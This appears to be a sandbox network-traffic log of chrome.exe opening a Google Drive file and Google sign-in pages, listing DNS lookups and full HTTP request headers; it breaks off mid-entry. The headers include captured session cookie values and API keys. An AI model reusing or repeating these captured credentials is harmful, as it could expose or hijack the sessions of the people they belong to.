                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://ssl.gstatic.com/docs/doclist/images/mediatype/icon_2_archive_x16.png
                                    chrome.exe
                                    Remote address:
                                    142.250.200.3:443
                                    Request
                                    GET /docs/doclist/images/mediatype/icon_2_archive_x16.png HTTP/2.0
                                    host: ssl.gstatic.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    blobcomments-pa.clients6.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    blobcomments-pa.clients6.google.com
                                    IN A
                                    Response
                                    blobcomments-pa.clients6.google.com
                                    IN A
                                    142.250.200.10
                                  • flag-us
                                    DNS
                                    content.googleapis.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    content.googleapis.com
                                    IN A
                                    Response
                                    content.googleapis.com
                                    IN A
                                    142.250.187.202
                                    content.googleapis.com
                                    IN A
                                    142.250.200.42
                                    content.googleapis.com
                                    IN A
                                    172.217.169.42
                                    content.googleapis.com
                                    IN A
                                    142.250.200.10
                                    content.googleapis.com
                                    IN A
                                    172.217.169.74
                                    content.googleapis.com
                                    IN A
                                    216.58.201.106
                                    content.googleapis.com
                                    IN A
                                    172.217.16.234
                                    content.googleapis.com
                                    IN A
                                    216.58.204.74
                                    content.googleapis.com
                                    IN A
                                    142.250.187.234
                                    content.googleapis.com
                                    IN A
                                    216.58.212.234
                                    content.googleapis.com
                                    IN A
                                    216.58.213.10
                                    content.googleapis.com
                                    IN A
                                    142.250.180.10
                                    content.googleapis.com
                                    IN A
                                    172.217.169.10
                                    content.googleapis.com
                                    IN A
                                    142.250.179.234
                                    content.googleapis.com
                                    IN A
                                    142.250.178.10
                                  • flag-be
                                    GET
                                    https://accounts.google.com/ServiceLogin?passive=1209600&osid=1&continue=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&followup=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com
                                    chrome.exe
                                    Remote address:
                                    142.251.173.84:443
                                    Request
                                    GET /ServiceLogin?passive=1209600&osid=1&continue=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&followup=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com HTTP/2.0
                                    host: accounts.google.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                  • flag-be
                                    GET
                                    https://accounts.google.com/InteractiveLogin?continue=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&followup=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&osid=1&passive=1209600&ifkv=AVdkyDnPrIwI-kcKd2ZIma2rg6AB0jptYpYfgRxymlpty1oMQQsMxzMao1DkvUCvd7j0BJJETKIA9w
                                    chrome.exe
                                    Remote address:
                                    142.251.173.84:443
                                    Request
                                    GET /InteractiveLogin?continue=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&followup=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&osid=1&passive=1209600&ifkv=AVdkyDnPrIwI-kcKd2ZIma2rg6AB0jptYpYfgRxymlpty1oMQQsMxzMao1DkvUCvd7j0BJJETKIA9w HTTP/2.0
                                    host: accounts.google.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                    cookie: __Host-GAPS=1:6Wj0hARP90C4zZXf-xP4mCM6x9fnqw:wwNNDzXbyzIJ1fmJ
                                  • flag-be
                                    GET
                                    https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&followup=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&ifkv=AVdkyDmbFBvOnivf3JKgdvaJHjX-vQRsw15vVblPbQ2Jwxojz1NmnflZi7hxkMzDV9PMLP9NVfJMaw&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1679321021%3A1736720401588527&ddm=1
                                    chrome.exe
                                    Remote address:
                                    142.251.173.84:443
                                    Request
                                    GET /v3/signin/identifier?continue=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&followup=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&ifkv=AVdkyDmbFBvOnivf3JKgdvaJHjX-vQRsw15vVblPbQ2Jwxojz1NmnflZi7hxkMzDV9PMLP9NVfJMaw&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1679321021%3A1736720401588527&ddm=1 HTTP/2.0
                                    host: accounts.google.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                    cookie: __Host-GAPS=1:6Wj0hARP90C4zZXf-xP4mCM6x9fnqw:wwNNDzXbyzIJ1fmJ
                                  • flag-gb
                                    GET
                                    https://content.googleapis.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__
                                    chrome.exe
                                    Remote address:
                                    142.250.187.202:443
                                    Request
                                    GET /static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__ HTTP/2.0
                                    host: content.googleapis.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://content.googleapis.com/drive/v2beta/files/1h8JICIA-04JL-lbd-QjlgqIibo65-pWv?fields=alternateLink%2CcopyRequiresWriterPermission%2CcreatedDate%2Cdescription%2CdriveId%2CfileSize%2CiconLink%2Cid%2Clabels(starred%2C%20trashed)%2ClastViewedByMeDate%2CmodifiedDate%2Cshared%2CteamDriveId%2CabuseNoticeReason%2CrestrictionVisualizationCallouts%2ClabelInfo%2CuserPermission(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cpermissions(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cparents(id)%2Ccapabilities(canMoveItemWithinDrive%2CcanMoveItemOutOfDrive%2CcanMoveItemOutOfTeamDrive%2CcanAddChildren%2CcanDownload%2CcanComment%2CcanEdit%2CcanInitiateEsignature%2CcanMoveChildrenWithinDrive%2CcanMoveItemIntoTeamDrive%2CcanRename%2CcanRemoveChildren)%2Ckind&supportsTeamDrives=true&includeBadgedLabels=true&enforceSingleParent=true&key=AIzaSyC1eQ1xj69IdTMeii5r7brs3R90eck-m7k
                                    chrome.exe
                                    Remote address:
                                    142.250.187.202:443
                                    Request
                                    GET /drive/v2beta/files/1h8JICIA-04JL-lbd-QjlgqIibo65-pWv?fields=alternateLink%2CcopyRequiresWriterPermission%2CcreatedDate%2Cdescription%2CdriveId%2CfileSize%2CiconLink%2Cid%2Clabels(starred%2C%20trashed)%2ClastViewedByMeDate%2CmodifiedDate%2Cshared%2CteamDriveId%2CabuseNoticeReason%2CrestrictionVisualizationCallouts%2ClabelInfo%2CuserPermission(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cpermissions(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cparents(id)%2Ccapabilities(canMoveItemWithinDrive%2CcanMoveItemOutOfDrive%2CcanMoveItemOutOfTeamDrive%2CcanAddChildren%2CcanDownload%2CcanComment%2CcanEdit%2CcanInitiateEsignature%2CcanMoveChildrenWithinDrive%2CcanMoveItemIntoTeamDrive%2CcanRename%2CcanRemoveChildren)%2Ckind&supportsTeamDrives=true&includeBadgedLabels=true&enforceSingleParent=true&key=AIzaSyC1eQ1xj69IdTMeii5r7brs3R90eck-m7k HTTP/2.0
                                    host: content.googleapis.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    x-goog-encode-response-if-executable: base64
                                    x-origin: https://drive.google.com
                                    x-clientdetails: appVersion=5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36&platform=Win32&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    x-requested-with: XMLHttpRequest
                                    x-javascript-user-agent: google-api-javascript-client/1.1.0
                                    x-goog-authuser: 0
                                    x-referer: https://drive.google.com
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://content.googleapis.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    OPTIONS
                                    https://blobcomments-pa.clients6.google.com/v1/metadata?docId=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&revisionId=0B0VkZ3O2boEdQVduNXorWjZSNGdpZitaRXN2UTJSeVZjRVNnPQ&userLocale=en-GB&timeZoneId=Etc%2FGMT&documentResourceKey.resourceKey&forceImportEnabled=true&key=AIzaSyCMp6sr4oTC18AWkE2Ii4UBZHTHEpGZWZM&%24unique=gc797
                                    chrome.exe
                                    Remote address:
                                    142.250.200.10:443
                                    Request
                                    OPTIONS /v1/metadata?docId=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&revisionId=0B0VkZ3O2boEdQVduNXorWjZSNGdpZitaRXN2UTJSeVZjRVNnPQ&userLocale=en-GB&timeZoneId=Etc%2FGMT&documentResourceKey.resourceKey&forceImportEnabled=true&key=AIzaSyCMp6sr4oTC18AWkE2Ii4UBZHTHEpGZWZM&%24unique=gc797 HTTP/2.0
                                    host: blobcomments-pa.clients6.google.com
                                    accept: */*
                                    access-control-request-method: GET
                                    access-control-request-headers: x-clientdetails,x-goog-authuser,x-goog-encode-response-if-executable,x-javascript-user-agent,x-requested-with
                                    origin: https://drive.google.com
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-fetch-mode: cors
                                    sec-fetch-site: same-site
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://blobcomments-pa.clients6.google.com/v1/metadata?docId=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&revisionId=0B0VkZ3O2boEdQVduNXorWjZSNGdpZitaRXN2UTJSeVZjRVNnPQ&userLocale=en-GB&timeZoneId=Etc%2FGMT&documentResourceKey.resourceKey&forceImportEnabled=true&key=AIzaSyCMp6sr4oTC18AWkE2Ii4UBZHTHEpGZWZM&%24unique=gc797
                                    chrome.exe
                                    Remote address:
                                    142.250.200.10:443
                                    Request
                                    GET /v1/metadata?docId=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&revisionId=0B0VkZ3O2boEdQVduNXorWjZSNGdpZitaRXN2UTJSeVZjRVNnPQ&userLocale=en-GB&timeZoneId=Etc%2FGMT&documentResourceKey.resourceKey&forceImportEnabled=true&key=AIzaSyCMp6sr4oTC18AWkE2Ii4UBZHTHEpGZWZM&%24unique=gc797 HTTP/2.0
                                    host: blobcomments-pa.clients6.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    x-goog-encode-response-if-executable: base64
                                    x-clientdetails: appVersion=5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36&platform=Win32&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    x-requested-with: XMLHttpRequest
                                    x-javascript-user-agent: google-api-javascript-client/1.1.0
                                    x-goog-authuser: 0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://drive.google.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    www.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    www.google.com
                                    IN A
                                    Response
                                    www.google.com
                                    IN A
                                    142.250.187.196
                                  • flag-gb
                                    GET
                                    https://apis.google.com/js/googleapis.proxy.js?onload=startup
                                    chrome.exe
                                    Remote address:
                                    142.250.178.14:443
                                    Request
                                    GET /js/googleapis.proxy.js?onload=startup HTTP/2.0
                                    host: apis.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://content.googleapis.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                  • flag-gb
                                    GET
                                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0?le=scs
                                    chrome.exe
                                    Remote address:
                                    142.250.178.14:443
                                    Request
                                    GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0?le=scs HTTP/2.0
                                    host: apis.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://content.googleapis.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                  • flag-gb
                                    GET
                                    https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
                                    chrome.exe
                                    Remote address:
                                    142.250.187.196:443
                                    Request
                                    GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/2.0
                                    host: www.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://accounts.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                  • flag-us
                                    DNS
                                    14.178.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    14.178.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    14.178.250.142.in-addr.arpa
                                    IN PTR
                                    lhr48s27-in-f141e100net
                                  • flag-us
                                    DNS
                                    202.187.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    202.187.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    202.187.250.142.in-addr.arpa
                                    IN PTR
                                    lhr25s33-in-f101e100net
                                  • flag-us
                                    DNS
                                    3.200.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    3.200.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    3.200.250.142.in-addr.arpa
                                    IN PTR
                                    lhr48s29-in-f31e100net
                                  • flag-us
                                    DNS
                                    10.200.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    10.200.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    10.200.250.142.in-addr.arpa
                                    IN PTR
                                    lhr48s29-in-f101e100net
                                  • flag-us
                                    DNS
                                    10.200.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    10.200.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    10.200.250.142.in-addr.arpa
                                    IN PTR
                                    lhr48s29-in-f101e100net
                                  • flag-us
                                    DNS
                                    peoplestackwebexperiments-pa.clients6.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    peoplestackwebexperiments-pa.clients6.google.com
                                    IN A
                                    Response
                                    peoplestackwebexperiments-pa.clients6.google.com
                                    IN A
                                    142.250.180.10
                                  • flag-gb
                                    OPTIONS
                                    https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags
                                    chrome.exe
                                    Remote address:
                                    142.250.180.10:443
                                    Request
                                    OPTIONS /$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags HTTP/2.0
                                    host: peoplestackwebexperiments-pa.clients6.google.com
                                    accept: */*
                                    access-control-request-method: POST
                                    access-control-request-headers: content-type,x-goog-api-key,x-user-agent
                                    origin: https://drive.google.com
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-fetch-mode: cors
                                    sec-fetch-site: same-site
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    OPTIONS
                                    https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags
                                    chrome.exe
                                    Remote address:
                                    142.250.180.10:443
                                    Request
                                    OPTIONS /$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags HTTP/2.0
                                    host: peoplestackwebexperiments-pa.clients6.google.com
                                    accept: */*
                                    access-control-request-method: POST
                                    access-control-request-headers: content-type,x-goog-api-key,x-user-agent
                                    origin: https://drive.google.com
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-fetch-mode: cors
                                    sec-fetch-site: same-site
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    POST
